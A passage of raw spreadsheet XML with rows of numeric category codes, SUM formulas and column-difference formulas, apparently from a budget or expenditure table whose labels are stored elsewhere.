      <c r="P641" s="17"/>
      <c r="Q641" s="17"/>
      <c r="R641" s="17"/>
      <c r="S641" s="17"/>
      <c r="T641" s="17"/>
      <c r="U641" s="17"/>
      <c r="V641" s="17"/>
      <c r="W641" s="17"/>
      <c r="X641" s="17"/>
      <c r="Y641" s="17"/>
      <c r="Z641" s="17"/>
      <c r="AA641" s="17"/>
      <c r="AB641" s="17"/>
      <c r="AC641" s="17"/>
      <c r="AD641" s="17"/>
      <c r="AE641" s="17">
        <f t="shared" si="295"/>
        <v>0</v>
      </c>
      <c r="AF641" s="17">
        <f t="shared" si="295"/>
        <v>0</v>
      </c>
      <c r="AG641" s="17">
        <f t="shared" si="295"/>
        <v>0</v>
      </c>
      <c r="AH641" s="17">
        <f t="shared" si="295"/>
        <v>0</v>
      </c>
      <c r="AI641" s="17">
        <f t="shared" si="295"/>
        <v>0</v>
      </c>
      <c r="AJ641" s="17">
        <f t="shared" si="295"/>
        <v>0</v>
      </c>
      <c r="AK641" s="17">
        <f t="shared" si="295"/>
        <v>0</v>
      </c>
      <c r="AL641" s="17">
        <f t="shared" si="295"/>
        <v>0</v>
      </c>
      <c r="AM641" s="17">
        <f t="shared" si="295"/>
        <v>0</v>
      </c>
      <c r="AN641" s="17">
        <f t="shared" si="295"/>
        <v>0</v>
      </c>
      <c r="AO641" s="17">
        <f t="shared" si="295"/>
        <v>0</v>
      </c>
      <c r="AP641" s="17">
        <f t="shared" si="295"/>
        <v>0</v>
      </c>
    </row>
    <row r="642" ht="18" customHeight="1" spans="1:42">
      <c r="A642" s="10"/>
      <c r="B642" s="10"/>
      <c r="C642" s="28"/>
      <c r="D642" s="10">
        <v>20820</v>
      </c>
      <c r="E642" s="11" t="s">
        <v>3455</v>
      </c>
      <c r="F642" s="14">
        <f t="shared" si="271"/>
        <v>47</v>
      </c>
      <c r="G642" s="12">
        <f t="shared" ref="G642:R642" si="296">SUM(G643:G644)</f>
        <v>6</v>
      </c>
      <c r="H642" s="12">
        <f t="shared" si="296"/>
        <v>3</v>
      </c>
      <c r="I642" s="12">
        <f t="shared" si="296"/>
        <v>4</v>
      </c>
      <c r="J642" s="12">
        <f t="shared" si="296"/>
        <v>3</v>
      </c>
      <c r="K642" s="12">
        <f t="shared" si="296"/>
        <v>11</v>
      </c>
      <c r="L642" s="12">
        <f t="shared" si="296"/>
        <v>1</v>
      </c>
      <c r="M642" s="12">
        <f t="shared" si="296"/>
        <v>11</v>
      </c>
      <c r="N642" s="12">
        <f t="shared" si="296"/>
        <v>2</v>
      </c>
      <c r="O642" s="12">
        <f t="shared" si="296"/>
        <v>0</v>
      </c>
      <c r="P642" s="12">
        <f t="shared" si="296"/>
        <v>11</v>
      </c>
      <c r="Q642" s="12">
        <f t="shared" si="296"/>
        <v>4</v>
      </c>
      <c r="R642" s="12">
        <f t="shared" si="296"/>
        <v>0</v>
      </c>
      <c r="S642" s="12">
        <v>5</v>
      </c>
      <c r="T642" s="12">
        <v>0</v>
      </c>
      <c r="U642" s="12">
        <v>18</v>
      </c>
      <c r="V642" s="12">
        <v>2</v>
      </c>
      <c r="W642" s="12">
        <v>3</v>
      </c>
      <c r="X642" s="12">
        <v>0</v>
      </c>
      <c r="Y642" s="12">
        <v>5</v>
      </c>
      <c r="Z642" s="12">
        <v>2</v>
      </c>
      <c r="AA642" s="12">
        <v>0</v>
      </c>
      <c r="AB642" s="12">
        <v>8</v>
      </c>
      <c r="AC642" s="12">
        <v>8</v>
      </c>
      <c r="AD642" s="12">
        <v>0</v>
      </c>
      <c r="AE642" s="12">
        <f t="shared" ref="AE642:AP642" si="297">SUM(AE643:AE644)</f>
        <v>1</v>
      </c>
      <c r="AF642" s="12">
        <f t="shared" si="297"/>
        <v>3</v>
      </c>
      <c r="AG642" s="12">
        <f t="shared" si="297"/>
        <v>-14</v>
      </c>
      <c r="AH642" s="12">
        <f t="shared" si="297"/>
        <v>1</v>
      </c>
      <c r="AI642" s="12">
        <f t="shared" si="297"/>
        <v>8</v>
      </c>
      <c r="AJ642" s="12">
        <f t="shared" si="297"/>
        <v>1</v>
      </c>
      <c r="AK642" s="12">
        <f t="shared" si="297"/>
        <v>6</v>
      </c>
      <c r="AL642" s="12">
        <f t="shared" si="297"/>
        <v>0</v>
      </c>
      <c r="AM642" s="12">
        <f t="shared" si="297"/>
        <v>0</v>
      </c>
      <c r="AN642" s="12">
        <f t="shared" si="297"/>
        <v>3</v>
      </c>
      <c r="AO642" s="12">
        <f t="shared" si="297"/>
        <v>-4</v>
      </c>
      <c r="AP642" s="12">
        <f t="shared" si="297"/>
        <v>0</v>
      </c>
    </row>
    <row r="643" ht="18" customHeight="1" spans="1:42">
      <c r="A643" s="10"/>
      <c r="B643" s="10"/>
      <c r="C643" s="28"/>
      <c r="D643" s="10">
        <v>2082001</v>
      </c>
      <c r="E643" s="16" t="s">
        <v>3456</v>
      </c>
      <c r="F643" s="14">
        <f t="shared" si="271"/>
        <v>47</v>
      </c>
      <c r="G643" s="17">
        <v>6</v>
      </c>
      <c r="H643" s="17">
        <v>3</v>
      </c>
      <c r="I643" s="17">
        <v>4</v>
      </c>
      <c r="J643" s="17">
        <v>3</v>
      </c>
      <c r="K643" s="17">
        <v>11</v>
      </c>
      <c r="L643" s="17">
        <v>1</v>
      </c>
      <c r="M643" s="17">
        <v>11</v>
      </c>
      <c r="N643" s="17">
        <v>2</v>
      </c>
      <c r="O643" s="17"/>
      <c r="P643" s="17">
        <v>11</v>
      </c>
      <c r="Q643" s="17">
        <v>4</v>
      </c>
      <c r="R643" s="17"/>
      <c r="S643" s="17">
        <v>5</v>
      </c>
      <c r="T643" s="17"/>
      <c r="U643" s="17">
        <v>18</v>
      </c>
      <c r="V643" s="17">
        <v>2</v>
      </c>
      <c r="W643" s="17">
        <v>3</v>
      </c>
      <c r="X643" s="17"/>
      <c r="Y643" s="17">
        <v>5</v>
      </c>
      <c r="Z643" s="17">
        <v>2</v>
      </c>
      <c r="AA643" s="17"/>
      <c r="AB643" s="17">
        <v>8</v>
      </c>
      <c r="AC643" s="17">
        <v>8</v>
      </c>
      <c r="AD643" s="17"/>
      <c r="AE643" s="17">
        <f t="shared" ref="AE643:AP644" si="298">G643-S643</f>
        <v>1</v>
      </c>
      <c r="AF643" s="17">
        <f t="shared" si="298"/>
        <v>3</v>
      </c>
      <c r="AG643" s="17">
        <f t="shared" si="298"/>
        <v>-14</v>
      </c>
      <c r="AH643" s="17">
        <f t="shared" si="298"/>
        <v>1</v>
      </c>
      <c r="AI643" s="17">
        <f t="shared" si="298"/>
        <v>8</v>
      </c>
      <c r="AJ643" s="17">
        <f t="shared" si="298"/>
        <v>1</v>
      </c>
      <c r="AK643" s="17">
        <f t="shared" si="298"/>
        <v>6</v>
      </c>
      <c r="AL643" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AM643" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AN643" s="17">
        <f t="shared" si="298"/>
        <v>3</v>
      </c>
      <c r="AO643" s="17">
        <f t="shared" si="298"/>
        <v>-4</v>
      </c>
      <c r="AP643" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
    </row>
    <row r="644" ht="18" customHeight="1" spans="1:42">
      <c r="A644" s="10"/>
      <c r="B644" s="10"/>
      <c r="C644" s="28"/>
      <c r="D644" s="10">
        <v>2082002</v>
      </c>
      <c r="E644" s="16" t="s">
        <v>3457</v>
      </c>
      <c r="F644" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G644" s="17"/>
      <c r="H644" s="17"/>
      <c r="I644" s="17"/>
      <c r="J644" s="17"/>
      <c r="K644" s="17"/>
      <c r="L644" s="17"/>
      <c r="M644" s="17"/>
      <c r="N644" s="17"/>
      <c r="O644" s="17"/>
      <c r="P644" s="17"/>
      <c r="Q644" s="17"/>
      <c r="R644" s="17"/>
      <c r="S644" s="17"/>
      <c r="T644" s="17"/>
      <c r="U644" s="17"/>
      <c r="V644" s="17"/>
      <c r="W644" s="17"/>
      <c r="X644" s="17"/>
      <c r="Y644" s="17"/>
      <c r="Z644" s="17"/>
      <c r="AA644" s="17"/>
      <c r="AB644" s="17"/>
      <c r="AC644" s="17"/>
      <c r="AD644" s="17"/>
      <c r="AE644" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AF644" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AG644" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AH644" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AI644" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AJ644" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AK644" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AL644" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AM644" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AN644" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AO644" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
      <c r="AP644" s="17">
        <f t="shared" si="298"/>
        <v>0</v>
      </c>
    </row>
    <row r="645" ht="18" customHeight="1" spans="1:42">
      <c r="A645" s="10"/>
      <c r="B645" s="10"/>
      <c r="C645" s="28"/>
      <c r="D645" s="10">
        <v>20821</v>
      </c>
      <c r="E645" s="11" t="s">
        <v>3458</v>
      </c>
      <c r="F645" s="14">
        <f t="shared" si="271"/>
        <v>10</v>
      </c>
      <c r="G645" s="12">
        <f t="shared" ref="G645:R645" si="299">SUM(G646:G647)</f>
        <v>0</v>
      </c>
      <c r="H645" s="12">
        <f t="shared" si="299"/>
        <v>0</v>
      </c>
      <c r="I645" s="12">
        <f t="shared" si="299"/>
        <v>0</v>
      </c>
      <c r="J645" s="12">
        <f t="shared" si="299"/>
        <v>0</v>
      </c>
      <c r="K645" s="12">
        <f t="shared" si="299"/>
        <v>0</v>
      </c>
      <c r="L645" s="12">
        <f t="shared" si="299"/>
        <v>10</v>
      </c>
      <c r="M645" s="12">
        <f t="shared" si="299"/>
        <v>0</v>
      </c>
      <c r="N645" s="12">
        <f t="shared" si="299"/>
        <v>0</v>
      </c>
      <c r="O645" s="12">
        <f t="shared" si="299"/>
        <v>0</v>
      </c>
      <c r="P645" s="12">
        <f t="shared" si="299"/>
        <v>0</v>
      </c>
      <c r="Q645" s="12">
        <f t="shared" si="299"/>
        <v>0</v>
      </c>
      <c r="R645" s="12">
        <f t="shared" si="299"/>
        <v>0</v>
      </c>
      <c r="S645" s="12">
        <v>0</v>
      </c>
      <c r="T645" s="12">
        <v>0</v>
      </c>
      <c r="U645" s="12">
        <v>0</v>
      </c>
      <c r="V645" s="12">
        <v>0</v>
      </c>
      <c r="W645" s="12">
        <v>0</v>
      </c>
      <c r="X645" s="12">
        <v>11</v>
      </c>
      <c r="Y645" s="12">
        <v>0</v>
      </c>
      <c r="Z645" s="12">
        <v>0</v>
      </c>
      <c r="AA645" s="12">
        <v>0</v>
      </c>
      <c r="AB645" s="12">
        <v>0</v>
      </c>
      <c r="AC645" s="12">
        <v>0</v>
      </c>
      <c r="AD645" s="12">
        <v>0</v>
      </c>
      <c r="AE645" s="12">
        <f t="shared" ref="AE645:AP645" si="300">SUM(AE646:AE647)</f>
        <v>0</v>
      </c>
      <c r="AF645" s="12">
        <f t="shared" si="300"/>
        <v>0</v>
      </c>
      <c r="AG645" s="12">
        <f t="shared" si="300"/>
        <v>0</v>
      </c>
      <c r="AH645" s="12">
        <f t="shared" si="300"/>
        <v>0</v>
      </c>
      <c r="AI645" s="12">
        <f t="shared" si="300"/>
        <v>0</v>
      </c>
      <c r="AJ645" s="12">
        <f t="shared" si="300"/>
        <v>-1</v>
      </c>
      <c r="AK645" s="12">
        <f t="shared" si="300"/>
        <v>0</v>
      </c>
      <c r="AL645" s="12">
        <f t="shared" si="300"/>
        <v>0</v>
      </c>
      <c r="AM645" s="12">
        <f t="shared" si="300"/>
        <v>0</v>
      </c>
      <c r="AN645" s="12">
        <f t="shared" si="300"/>
        <v>0</v>
      </c>
      <c r="AO645" s="12">
        <f t="shared" si="300"/>
        <v>0</v>
      </c>
      <c r="AP645" s="12">
        <f t="shared" si="300"/>
        <v>0</v>
      </c>
    </row>
    <row r="646" ht="18" customHeight="1" spans="1:42">
      <c r="A646" s="10"/>
      <c r="B646" s="10"/>
      <c r="C646" s="28"/>
      <c r="D646" s="10">
        <v>2082101</v>
      </c>
      <c r="E646" s="16" t="s">
        <v>3459</v>
      </c>
      <c r="F646" s="14">
        <f t="shared" ref="F646:F709" si="301">SUM(I646:R646)</f>
        <v>0</v>
      </c>
      <c r="G646" s="17"/>
      <c r="H646" s="17"/>
      <c r="I646" s="17"/>
      <c r="J646" s="17"/>
      <c r="K646" s="17"/>
      <c r="L646" s="17"/>
      <c r="M646" s="17"/>
      <c r="N646" s="17"/>
      <c r="O646" s="17"/>
      <c r="P646" s="17"/>
      <c r="Q646" s="17"/>
      <c r="R646" s="17"/>
      <c r="S646" s="17"/>
      <c r="T646" s="17"/>
      <c r="U646" s="17"/>
      <c r="V646" s="17"/>
      <c r="W646" s="17"/>
      <c r="X646" s="17"/>
      <c r="Y646" s="17"/>
      <c r="Z646" s="17"/>
      <c r="AA646" s="17"/>
      <c r="AB646" s="17"/>
      <c r="AC646" s="17"/>
      <c r="AD646" s="17"/>
      <c r="AE646" s="17">
        <f t="shared" ref="AE646:AP647" si="302">G646-S646</f>
        <v>0</v>
      </c>
      <c r="AF646" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AG646" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AH646" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AI646" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AJ646" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AK646" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AL646" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AM646" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AN646" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AO646" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AP646" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
    </row>
    <row r="647" ht="18" customHeight="1" spans="1:42">
      <c r="A647" s="10"/>
      <c r="B647" s="10"/>
      <c r="C647" s="28"/>
      <c r="D647" s="10">
        <v>2082102</v>
      </c>
      <c r="E647" s="16" t="s">
        <v>3460</v>
      </c>
      <c r="F647" s="14">
        <f t="shared" si="301"/>
        <v>10</v>
      </c>
      <c r="G647" s="17"/>
      <c r="H647" s="17"/>
      <c r="I647" s="17"/>
      <c r="J647" s="17"/>
      <c r="K647" s="17"/>
      <c r="L647" s="17">
        <v>10</v>
      </c>
      <c r="M647" s="17"/>
      <c r="N647" s="17"/>
      <c r="O647" s="17"/>
      <c r="P647" s="17"/>
      <c r="Q647" s="17"/>
      <c r="R647" s="17"/>
      <c r="S647" s="17"/>
      <c r="T647" s="17"/>
      <c r="U647" s="17"/>
      <c r="V647" s="17"/>
      <c r="W647" s="17"/>
      <c r="X647" s="17">
        <v>11</v>
      </c>
      <c r="Y647" s="17"/>
      <c r="Z647" s="17"/>
      <c r="AA647" s="17"/>
      <c r="AB647" s="17"/>
      <c r="AC647" s="17"/>
      <c r="AD647" s="17"/>
      <c r="AE647" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AF647" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AG647" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AH647" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AI647" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AJ647" s="17">
        <f t="shared" si="302"/>
        <v>-1</v>
      </c>
      <c r="AK647" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AL647" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AM647" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AN647" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AO647" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
      <c r="AP647" s="17">
        <f t="shared" si="302"/>
        <v>0</v>
      </c>
    </row>
    <row r="648" ht="18" customHeight="1" spans="1:42">
      <c r="A648" s="10"/>
      <c r="B648" s="10"/>
      <c r="C648" s="28"/>
      <c r="D648" s="10">
        <v>20824</v>
      </c>
      <c r="E648" s="11" t="s">
        <v>3461</v>
      </c>
      <c r="F648" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G648" s="12">
        <f t="shared" ref="G648:R648" si="303">SUM(G649:G650)</f>
        <v>0</v>
      </c>
      <c r="H648" s="12">
        <f t="shared" si="303"/>
        <v>0</v>
      </c>
      <c r="I648" s="12">
        <f t="shared" si="303"/>
        <v>0</v>
      </c>
      <c r="J648" s="12">
        <f t="shared" si="303"/>
        <v>0</v>
      </c>
      <c r="K648" s="12">
        <f t="shared" si="303"/>
        <v>0</v>
      </c>
      <c r="L648" s="12">
        <f t="shared" si="303"/>
        <v>0</v>
      </c>
      <c r="M648" s="12">
        <f t="shared" si="303"/>
        <v>0</v>
      </c>
      <c r="N648" s="12">
        <f t="shared" si="303"/>
        <v>0</v>
      </c>
      <c r="O648" s="12">
        <f t="shared" si="303"/>
        <v>0</v>
      </c>
      <c r="P648" s="12">
        <f t="shared" si="303"/>
        <v>0</v>
      </c>
      <c r="Q648" s="12">
        <f t="shared" si="303"/>
        <v>0</v>
      </c>
      <c r="R648" s="12">
        <f t="shared" si="303"/>
        <v>0</v>
      </c>
      <c r="S648" s="12">
        <v>0</v>
      </c>
      <c r="T648" s="12">
        <v>0</v>
      </c>
      <c r="U648" s="12">
        <v>0</v>
      </c>
      <c r="V648" s="12">
        <v>0</v>
      </c>
      <c r="W648" s="12">
        <v>0</v>
      </c>
      <c r="X648" s="12">
        <v>0</v>
      </c>
      <c r="Y648" s="12">
        <v>0</v>
      </c>
      <c r="Z648" s="12">
        <v>0</v>
      </c>
      <c r="AA648" s="12">
        <v>0</v>
      </c>
      <c r="AB648" s="12">
        <v>0</v>
      </c>
      <c r="AC648" s="12">
        <v>0</v>
      </c>
      <c r="AD648" s="12">
        <v>0</v>
      </c>
      <c r="AE648" s="12">
        <f t="shared" ref="AE648:AP648" si="304">SUM(AE649:AE650)</f>
        <v>0</v>
      </c>
      <c r="AF648" s="12">
        <f t="shared" si="304"/>
        <v>0</v>
      </c>
      <c r="AG648" s="12">
        <f t="shared" si="304"/>
        <v>0</v>
      </c>
      <c r="AH648" s="12">
        <f t="shared" si="304"/>
        <v>0</v>
      </c>
      <c r="AI648" s="12">
        <f t="shared" si="304"/>
        <v>0</v>
      </c>
      <c r="AJ648" s="12">
        <f t="shared" si="304"/>
        <v>0</v>
      </c>
      <c r="AK648" s="12">
        <f t="shared" si="304"/>
        <v>0</v>
      </c>
      <c r="AL648" s="12">
        <f t="shared" si="304"/>
        <v>0</v>
      </c>
      <c r="AM648" s="12">
        <f t="shared" si="304"/>
        <v>0</v>
      </c>
      <c r="AN648" s="12">
        <f t="shared" si="304"/>
        <v>0</v>
      </c>
      <c r="AO648" s="12">
        <f t="shared" si="304"/>
        <v>0</v>
      </c>
      <c r="AP648" s="12">
        <f t="shared" si="304"/>
        <v>0</v>
      </c>
    </row>
    <row r="649" ht="18" customHeight="1" spans="1:42">
      <c r="A649" s="10"/>
      <c r="B649" s="10"/>
      <c r="C649" s="28"/>
      <c r="D649" s="10">
        <v>2082401</v>
      </c>
      <c r="E649" s="16" t="s">
        <v>3462</v>
      </c>
      <c r="F649" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G649" s="17"/>
      <c r="H649" s="17"/>
      <c r="I649" s="17"/>
      <c r="J649" s="17"/>
      <c r="K649" s="17"/>
      <c r="L649" s="17"/>
      <c r="M649" s="17"/>
      <c r="N649" s="17"/>
      <c r="O649" s="17"/>
      <c r="P649" s="17"/>
      <c r="Q649" s="17"/>
      <c r="R649" s="17"/>
      <c r="S649" s="17"/>
      <c r="T649" s="17"/>
      <c r="U649" s="17"/>
      <c r="V649" s="17"/>
      <c r="W649" s="17"/>
      <c r="X649" s="17"/>
      <c r="Y649" s="17"/>
      <c r="Z649" s="17"/>
      <c r="AA649" s="17"/>
      <c r="AB649" s="17"/>
      <c r="AC649" s="17"/>
      <c r="AD649" s="17"/>
      <c r="AE649" s="17">
        <f t="shared" ref="AE649:AP650" si="305">G649-S649</f>
        <v>0</v>
      </c>
      <c r="AF649" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AG649" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AH649" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AI649" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AJ649" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AK649" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AL649" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AM649" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AN649" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AO649" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AP649" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
    </row>
    <row r="650" ht="18" customHeight="1" spans="1:42">
      <c r="A650" s="10"/>
      <c r="B650" s="10"/>
      <c r="C650" s="28"/>
      <c r="D650" s="10">
        <v>2082402</v>
      </c>
      <c r="E650" s="16" t="s">
        <v>3463</v>
      </c>
      <c r="F650" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G650" s="17"/>
      <c r="H650" s="17"/>
      <c r="I650" s="17"/>
      <c r="J650" s="17"/>
      <c r="K650" s="17"/>
      <c r="L650" s="17"/>
      <c r="M650" s="17"/>
      <c r="N650" s="17"/>
      <c r="O650" s="17"/>
      <c r="P650" s="17"/>
      <c r="Q650" s="17"/>
      <c r="R650" s="17"/>
      <c r="S650" s="17"/>
      <c r="T650" s="17"/>
      <c r="U650" s="17"/>
      <c r="V650" s="17"/>
      <c r="W650" s="17"/>
      <c r="X650" s="17"/>
      <c r="Y650" s="17"/>
      <c r="Z650" s="17"/>
      <c r="AA650" s="17"/>
      <c r="AB650" s="17"/>
      <c r="AC650" s="17"/>
      <c r="AD650" s="17"/>
      <c r="AE650" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AF650" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AG650" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AH650" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AI650" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AJ650" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AK650" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AL650" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AM650" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AN650" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AO650" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AP650" s="17">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
    </row>
    <row r="651" ht="18" customHeight="1" spans="1:42">
      <c r="A651" s="10"/>
      <c r="B651" s="10"/>
      <c r="C651" s="28"/>
      <c r="D651" s="10">
        <v>20825</v>
      </c>
      <c r="E651" s="11" t="s">
        <v>3464</v>
      </c>
      <c r="F651" s="14">
        <f t="shared" si="301"/>
        <v>2</v>
      </c>
      <c r="G651" s="12">
        <f t="shared" ref="G651:R651" si="306">SUM(G652:G653)</f>
        <v>0</v>
      </c>
      <c r="H651" s="12">
        <f t="shared" si="306"/>
        <v>20</v>
      </c>
      <c r="I651" s="12">
        <f t="shared" si="306"/>
        <v>2</v>
      </c>
      <c r="J651" s="12">
        <f t="shared" si="306"/>
        <v>0</v>
      </c>
      <c r="K651" s="12">
        <f t="shared" si="306"/>
        <v>0</v>
      </c>
      <c r="L651" s="12">
        <f t="shared" si="306"/>
        <v>0</v>
      </c>
      <c r="M651" s="12">
        <f t="shared" si="306"/>
        <v>0</v>
      </c>
      <c r="N651" s="12">
        <f t="shared" si="306"/>
        <v>0</v>
      </c>
      <c r="O651" s="12">
        <f t="shared" si="306"/>
        <v>0</v>
      </c>
      <c r="P651" s="12">
        <f t="shared" si="306"/>
        <v>0</v>
      </c>
      <c r="Q651" s="12">
        <f t="shared" si="306"/>
        <v>0</v>
      </c>
      <c r="R651" s="12">
        <f t="shared" si="306"/>
        <v>0</v>
      </c>
      <c r="S651" s="12">
        <v>0</v>
      </c>
      <c r="T651" s="12">
        <v>20</v>
      </c>
      <c r="U651" s="12">
        <v>2</v>
      </c>
      <c r="V651" s="12">
        <v>0</v>
      </c>
      <c r="W651" s="12">
        <v>0</v>
      </c>
      <c r="X651" s="12">
        <v>0</v>
      </c>
      <c r="Y651" s="12">
        <v>0</v>
      </c>
      <c r="Z651" s="12">
        <v>0</v>
      </c>
      <c r="AA651" s="12">
        <v>0</v>
      </c>
      <c r="AB651" s="12">
        <v>0</v>
      </c>
      <c r="AC651" s="12">
        <v>0</v>
      </c>
      <c r="AD651" s="12">
        <v>0</v>
      </c>
      <c r="AE651" s="12">
        <f t="shared" ref="AE651:AP651" si="307">SUM(AE652:AE653)</f>
        <v>0</v>
      </c>
      <c r="AF651" s="12">
        <f t="shared" si="307"/>
        <v>0</v>
      </c>
      <c r="AG651" s="12">
        <f t="shared" si="307"/>
        <v>0</v>
      </c>
      <c r="AH651" s="12">
        <f t="shared" si="307"/>
        <v>0</v>
      </c>
      <c r="AI651" s="12">
        <f t="shared" si="307"/>
        <v>0</v>
      </c>
      <c r="AJ651" s="12">
        <f t="shared" si="307"/>
        <v>0</v>
      </c>
      <c r="AK651" s="12">
        <f t="shared" si="307"/>
        <v>0</v>
      </c>
      <c r="AL651" s="12">
        <f t="shared" si="307"/>
        <v>0</v>
      </c>
      <c r="AM651" s="12">
        <f t="shared" si="307"/>
        <v>0</v>
      </c>
      <c r="AN651" s="12">
        <f t="shared" si="307"/>
        <v>0</v>
      </c>
      <c r="AO651" s="12">
        <f t="shared" si="307"/>
        <v>0</v>
      </c>
      <c r="AP651" s="12">
        <f t="shared" si="307"/>
        <v>0</v>
      </c>
    </row>
    <row r="652" ht="18" customHeight="1" spans="1:42">
      <c r="A652" s="10"/>
      <c r="B652" s="10"/>
      <c r="C652" s="28"/>
      <c r="D652" s="10">
        <v>2082501</v>
      </c>
      <c r="E652" s="16" t="s">
        <v>3465</v>
      </c>
      <c r="F652" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G652" s="17"/>
      <c r="H652" s="17"/>
      <c r="I652" s="17"/>
      <c r="J652" s="17"/>
      <c r="K652" s="17"/>
      <c r="L652" s="17"/>
      <c r="M652" s="17"/>
      <c r="N652" s="17"/>
      <c r="O652" s="17"/>
      <c r="P652" s="17"/>
      <c r="Q652" s="17"/>
      <c r="R652" s="17"/>
      <c r="S652" s="17"/>
      <c r="T652" s="17"/>
      <c r="U652" s="17"/>
      <c r="V652" s="17"/>
      <c r="W652" s="17"/>
      <c r="X652" s="17"/>
      <c r="Y652" s="17"/>
      <c r="Z652" s="17"/>
      <c r="AA652" s="17"/>
      <c r="AB652" s="17"/>
      <c r="AC652" s="17"/>
      <c r="AD652" s="17"/>
      <c r="AE652" s="17">
        <f t="shared" ref="AE652:AP653" si="308">G652-S652</f>
        <v>0</v>
      </c>
      <c r="AF652" s="17">
        <f t="shared" si="308"/>
        <v>0</v>
      </c>
      <c r="AG652" s="17">
        <f t="shared" si="308"/>
        <v>0</v>
      </c>
      <c r="AH652" s="17">
        <f t="shared" si="308"/>
        <v>0</v>
      </c>
      <c r="AI652" s="17">
        <f t="shared" si="308"/>
        <v>0</v>
      </c>
      <c r="AJ652" s="17">
        <f t="shared" si="308"/>
        <v>0</v>
      </c>
      <c r="AK652" s="17">
        <f t="shared" si="308"/>
        <v>0</v>
      </c>
      <c r="AL652" s="17">
        <f t="shared" si="308"/>
        <v>0</v>
      </c>
      <c r="AM652" s="17">
        <f t="shared" si="308"/>
        <v>0</v>
      </c>
      <c r="AN652" s="17">
        <f t="shared" si="308"/>
        <v>0</v>
      </c>
      <c r="AO652" s="17">
        <f t="shared" si="308"/>
        <v>0</v>
      </c>
      <c r="AP652" s="17">
        <f t="shared" si="308"/>
        <v>0</v>
      </c>
    </row>
    <row r="653" ht="18" customHeight="1" spans="1:42">
      <c r="A653" s="10"/>
      <c r="B653" s="10"/>
      <c r="C653" s="28"/>
      <c r="D653" s="10">
        <v>2082502</v>
      </c>
      <c r="E653" s="16" t="s">
        <v>3466</v>
      </c>
      <c r="F653" s="14">
        <f t="shared" si="301"/>
